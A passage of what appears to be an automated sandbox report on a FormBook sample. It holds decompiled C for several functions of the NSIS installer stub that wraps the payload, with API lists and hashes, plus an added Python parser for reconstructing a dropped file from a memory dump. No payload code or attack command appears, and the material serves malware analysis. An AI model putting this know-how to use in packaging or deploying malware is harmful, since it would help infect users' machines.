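The inner loop of E004027DF above walks a block of records laid out as {u32 size, u32 offset, size bytes of data}, stops at a zero size, and memcpy's each record's data over the file image at the given offset before writing the image to the newly created file (opened with GENERIC_WRITE = 0x40000000, CREATE_ALWAYS = 2) and deleting the file again if the write fails. Together with the "verifying installer: %d%%" string and the MAX_PATH+1 = 0x105 enumeration buffer in the neighbouring routines, this is the logic of the open-source NSIS installer stub, i.e. the wrapper around the FormBook payload rather than the payload itself. The Python below is an added example, not part of this report or of the sample: it parses that record stream (the layout is inferred from the decompiled loop, not documented by the report) over a constructed byte string, applies it to a constructed image, and adds the bounds and termination checks the decompiled loop does not perform, which matters when reconstructing the written file from a memory dump whose record block may be truncated.

```python
import struct
from typing import List, Tuple

# Record layout as read from the decompiled loop in E004027DF:
#   u32 size | u32 offset | size bytes of data, repeated; a zero size ends the stream.
# Inferred from the decompiled code; the report does not document this format.
HEADER = struct.Struct("<II")


def parse_patch_records(blob: bytes) -> List[Tuple[int, bytes]]:
    """Return [(offset, data), ...] from a record stream; stops at size == 0.

    Raises ValueError on a stream that ends mid-record or has no terminator,
    both cases where the decompiled loop would read past its buffer.
    """
    records = []
    pos = 0
    while pos + HEADER.size <= len(blob):
        size, offset = HEADER.unpack_from(blob, pos)
        if size == 0:  # terminator, same test as `while (*_t54 != 0)`
            break
        data = blob[pos + HEADER.size : pos + HEADER.size + size]
        if len(data) != size:  # stream ends in the middle of a record
            raise ValueError(f"record at {pos:#x} claims {size} bytes, only {len(data)} present")
        records.append((offset, data))
        pos += HEADER.size + size
    else:
        raise ValueError("record stream has no zero-size terminator")
    return records


def stream_is_wellformed(blob: bytes) -> bool:
    """True if the stream parses cleanly, False on truncation or missing terminator."""
    try:
        parse_patch_records(blob)
        return True
    except ValueError:
        return False


def patch_fits(image_len: int, offset: int, size: int) -> bool:
    """The bounds check the stub omits: the write must stay inside the image."""
    return 0 <= offset and offset + size <= image_len


def apply_patches(image: bytes, records: List[Tuple[int, bytes]]) -> bytes:
    """Copy each record's data over `image` at its offset, like the memcpy in the loop."""
    buf = bytearray(image)
    for offset, data in records:
        if not patch_fits(len(buf), offset, len(data)):
            raise ValueError(f"patch {offset:#x}+{len(data)} exceeds image of {len(buf)} bytes")
        buf[offset : offset + len(data)] = data
    return bytes(buf)


def build_records(patches: List[Tuple[int, bytes]]) -> bytes:
    """Inverse of parse_patch_records; used only to construct the sample input below."""
    out = bytearray()
    for offset, data in patches:
        out += HEADER.pack(len(data), offset) + data
    out += HEADER.pack(0, 0)
    return bytes(out)


# Constructed sample input (not taken from the sample): a 32-byte image and two patches.
SAMPLE_IMAGE = bytes(range(32))
SAMPLE_RECORDS = build_records([(4, b"\xde\xad\xbe\xef"), (28, b"PTCH")])


def demo() -> bytes:
    """Parse the constructed record stream and apply it to the constructed image."""
    return apply_patches(SAMPLE_IMAGE, parse_patch_records(SAMPLE_RECORDS))


if __name__ == "__main__":
    print(demo().hex())
```

To use this against a real dump, feed the bytes at the second GlobalAlloc buffer (the one filled by E004030D8 with the length held at ebp-0x20) as the record stream and the first buffer (length at ebp-0x30) as the image; a stream that fails `stream_is_wellformed` means the dump was cut short and the reconstructed file should not be trusted.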

                                                                        C-Code - Quality: 48%
                                                                        			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				char _v276;
                                                                        				void* _t27;
                                                                        				signed int _t33;
                                                                        				intOrPtr* _t35;
                                                                        				signed int _t45;
                                                                        				signed int _t46;
                                                                        				signed int _t47;
                                                                        
                                                                        				_t46 = _a12;
                                                                        				_t47 = _t46 & 0x00000300;
                                                                        				_t45 = _t46 & 0x00000001;
                                                                        				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                        				if(_t27 == 0) {
                                                                        					if((_a12 & 0x00000002) == 0) {
                                                                        						L3:
                                                                        						_push(0x105);
                                                                        						_push( &_v276);
                                                                        						_push(0);
                                                                        						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                        							__eflags = _t45;
                                                                        							if(__eflags != 0) {
                                                                        								L10:
                                                                        								RegCloseKey(_v8);
                                                                        								return 0x3eb;
                                                                        							}
                                                                        							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							_push(0x105);
                                                                        							_push( &_v276);
                                                                        							_push(_t45);
                                                                        						}
                                                                        						RegCloseKey(_v8);
                                                                        						_t35 = E00406500(3);
                                                                        						if(_t35 != 0) {
                                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                                        						}
                                                                        						return RegDeleteKeyA(_a4, _a8);
                                                                        					}
                                                                        					_v12 = 0;
                                                                        					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                        						goto L10;
                                                                        					}
                                                                        					goto L3;
                                                                        				}
                                                                        				return _t27;
                                                                        			}












Instruction addresses: 0x00402cdb .. 0x00402db7

                                                                        APIs
                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                        • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                        • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                        • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00401D65(void* __ebx, void* __edx) {
                                                                        				struct HWND__* _t30;
                                                                        				CHAR* _t38;
                                                                        				void* _t48;
                                                                        				void* _t53;
                                                                        				signed int _t55;
                                                                        				signed int _t58;
                                                                        				long _t61;
                                                                        				void* _t65;
                                                                        
                                                                        				_t53 = __ebx;
                                                                        				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                        				} else {
                                                                        					E00402BAC(2);
                                                                        					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                        				}
                                                                        				_t55 =  *(_t65 - 0x1c);
                                                                        				 *(_t65 + 8) = _t30;
                                                                        				_t58 = _t55 & 0x00000004;
                                                                        				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                        				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                        				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                        				if((_t55 & 0x00010000) == 0) {
                                                                        					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                        				} else {
                                                                        					_t38 = E00402BCE(0x11);
                                                                        				}
                                                                        				 *(_t65 - 8) = _t38;
                                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                        				asm("sbb edi, edi");
                                                                        				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                        				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                        				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                        					DeleteObject(_t48);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                        					_push(_t61);
                                                                        					E00406055();
                                                                        				}
                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
• Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                        • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                        • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                        • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E00401E35(intOrPtr __edx) {
                                                                        				void* __esi;
                                                                        				int _t9;
                                                                        				signed char _t15;
                                                                        				struct HFONT__* _t18;
                                                                        				intOrPtr _t30;
                                                                        				struct HDC__* _t31;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				_t30 = __edx;
                                                                        				_t31 = GetDC( *(_t35 - 8));
                                                                        				_t9 = E00402BAC(2);
                                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                        				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                        				ReleaseDC( *(_t35 - 8), _t31);
                                                                        				 *0x40b848 = E00402BAC(3);
                                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                        				 *0x40b84f = 1;
                                                                        				 *0x40b84c = _t15 & 0x00000001;
                                                                        				 *0x40b84d = _t15 & 0x00000002;
                                                                        				 *0x40b84e = _t15 & 0x00000004;
                                                                        				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                                                                        				_t18 = CreateFontIndirectA(0x40b838);
                                                                        				_push(_t18);
                                                                        				_push(_t33);
                                                                        				E00406055();
                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                        • ReleaseDC.USER32 ref: 00401E6B
                                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                        • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                        • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                        • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E00401C2E(intOrPtr __edx) {
                                                                        				int _t29;
                                                                        				long _t30;
                                                                        				signed int _t32;
                                                                        				CHAR* _t35;
                                                                        				long _t36;
                                                                        				int _t41;
                                                                        				signed int _t42;
                                                                        				int _t46;
                                                                        				int _t56;
                                                                        				intOrPtr _t57;
                                                                        				struct HWND__* _t61;
                                                                        				void* _t64;
                                                                        
                                                                        				_t57 = __edx;
                                                                        				_t29 = E00402BAC(3);
                                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                        				 *(_t64 - 8) = _t29;
                                                                        				_t30 = E00402BAC(4);
                                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                        				 *(_t64 + 8) = _t30;
                                                                        				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                        					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                        				}
                                                                        				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                        				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                        					 *(_t64 + 8) = E00402BCE(0x44);
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                        				_push(1);
                                                                        				if(__eflags != 0) {
                                                                        					_t59 = E00402BCE();
                                                                        					_t32 = E00402BCE();
                                                                        					asm("sbb ecx, ecx");
                                                                        					asm("sbb eax, eax");
                                                                        					_t35 =  ~( *_t31) & _t59;
                                                                        					__eflags = _t35;
                                                                        					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                        					goto L10;
                                                                        				} else {
                                                                        					_t61 = E00402BAC();
                                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                        					_t41 = E00402BAC(2);
                                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                        					_t56 =  *(_t64 - 0x14) >> 2;
                                                                        					if(__eflags == 0) {
                                                                        						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                        						L10:
                                                                        						 *(_t64 - 0xc) = _t36;
                                                                        					} else {
                                                                        						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                        						asm("sbb eax, eax");
                                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                        					}
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                        				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                        					_push( *(_t64 - 0xc));
                                                                        					E00406055();
                                                                        				}
                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                        • SendMessageA.USER32 ref: 00401CB6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                        • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                        • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                        • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                        				char _v36;
                                                                        				char _v68;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				signed int _t22;
                                                                        				void* _t29;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        				void* _t41;
                                                                        				signed int _t43;
                                                                        				signed int _t47;
                                                                        				signed int _t50;
                                                                        				signed int _t51;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t21 = _a16;
                                                                        				_t51 = _a12;
                                                                        				_t41 = 0xffffffdc;
                                                                        				if(_t21 == 0) {
                                                                        					_push(0x14);
                                                                        					_pop(0);
                                                                        					_t22 = _t51;
                                                                        					if(_t51 < 0x100000) {
                                                                        						_push(0xa);
                                                                        						_pop(0);
                                                                        						_t41 = 0xffffffdd;
                                                                        					}
                                                                        					if(_t51 < 0x400) {
                                                                        						_t41 = 0xffffffde;
                                                                        					}
                                                                        					if(_t51 < 0xffff3333) {
                                                                        						_t50 = 0x14;
                                                                        						asm("cdq");
                                                                        						_t22 = 1 / _t50 + _t51;
                                                                        					}
                                                                        					_t23 = _t22 & 0x00ffffff;
                                                                        					_t53 = _t22 >> 0;
                                                                        					_t43 = 0xa;
                                                                        					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                        				} else {
                                                                        					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                        					_t47 = 0;
                                                                        				}
                                                                        				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                        				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                                                                        				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                                        				// format _t53 and _t47 plus the two strings _t31/_t29 as "%u.%u%s%s", appended after the
                                                                        				// existing contents of the buffer at 0x42a890, then write the buffer to dialog item _a4
                                                                        				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                        				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                        • wsprintfA.USER32 ref: 00404A6A
                                                                        • SetDlgItemTextA.USER32 ref: 00404A7D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                        • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                        • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                        • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405A8F(CHAR* _a4) {
                                                                        				CHAR* _t7;
                                                                        
                                                                        				_t7 = _a4;
                                                                        				// if the last character of the path is not '\\' (0x5c), append the string at 0x40a014
                                                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                        					lstrcatA(_t7, 0x40a014);
                                                                        				}
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-823278215
                                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                        • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                        • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402E3D(intOrPtr _a4) {
                                                                        				long _t2;
                                                                        				struct HWND__* _t3;
                                                                        				struct HWND__* _t6;
                                                                        
                                                                        				// _a4 == 0: create and show the dialog; _a4 != 0: destroy it
                                                                        				// *0x429448 holds the dialog window handle
                                                                        				if(_a4 == 0) {
                                                                        					if( *0x429448 == 0) {
                                                                        						// only create the dialog once the tick count has passed the stored threshold at *0x42f430
                                                                        						_t2 = GetTickCount();
                                                                        						if(_t2 >  *0x42f430) {
                                                                        							// modeless dialog from resource 0x6f, dialog procedure E00402DBA
                                                                        							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                                                                        							 *0x429448 = _t3;
                                                                        							return ShowWindow(_t3, 5); // 5 == SW_SHOW
                                                                        						}
                                                                        						return _t2;
                                                                        					} else {
                                                                        						return E0040653C(0);
                                                                        					}
                                                                        				} else {
                                                                        					_t6 =  *0x429448;
                                                                        					if(_t6 != 0) {
                                                                        						_t6 = DestroyWindow(_t6);
                                                                        					}
                                                                        					 *0x429448 = 0;
                                                                        					return _t6;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                        • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                        • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                        • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00405B7D(void* __eflags, intOrPtr _a4) {
                                                                        				int _t11;
                                                                        				signed char* _t12;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        
                                                                        				// copy _a4 into the global path buffer at 0x42bc98 (lstrcpynA subcall)
                                                                        				E004060F7(0x42bc98, _a4);
                                                                        				// skip past the path root (CharNextA subcall); 0 means the path has no usable root
                                                                        				_t21 = E00405B28(0x42bc98);
                                                                        				if(_t21 != 0) {
                                                                        					E004063D2(_t21);
                                                                        					if(( *0x42f43c & 0x00000080) == 0) {
                                                                        						L5:
                                                                        						// _t22 = length of the root part; strip trailing components while the path
                                                                        						// is longer than the root and does not resolve to a directory
                                                                        						_t22 = _t21 - 0x42bc98;
                                                                        						while(1) {
                                                                        							_t11 = lstrlenA(0x42bc98);
                                                                        							_push(0x42bc98);
                                                                        							if(_t11 <= _t22) {
                                                                        								break;
                                                                        							}
                                                                        							_t12 = E0040646B();
                                                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) { // 0x10 == FILE_ATTRIBUTE_DIRECTORY
                                                                        								E00405AD6(0x42bc98);
                                                                        								continue;
                                                                        							} else {
                                                                        								goto L1;
                                                                        							}
                                                                        						}
                                                                        						// ensure a trailing backslash, then report whether the path exists
                                                                        						E00405A8F();
                                                                        						return 0 | GetFileAttributesA(??) != 0xffffffff; // 0xffffffff == INVALID_FILE_ATTRIBUTES
                                                                        					}
                                                                        					_t18 =  *_t21;
                                                                        					if(_t18 == 0 || _t18 == 0x5c) { // 0x5c == '\\'
                                                                        						goto L1;
                                                                        					} else {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				L1:
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
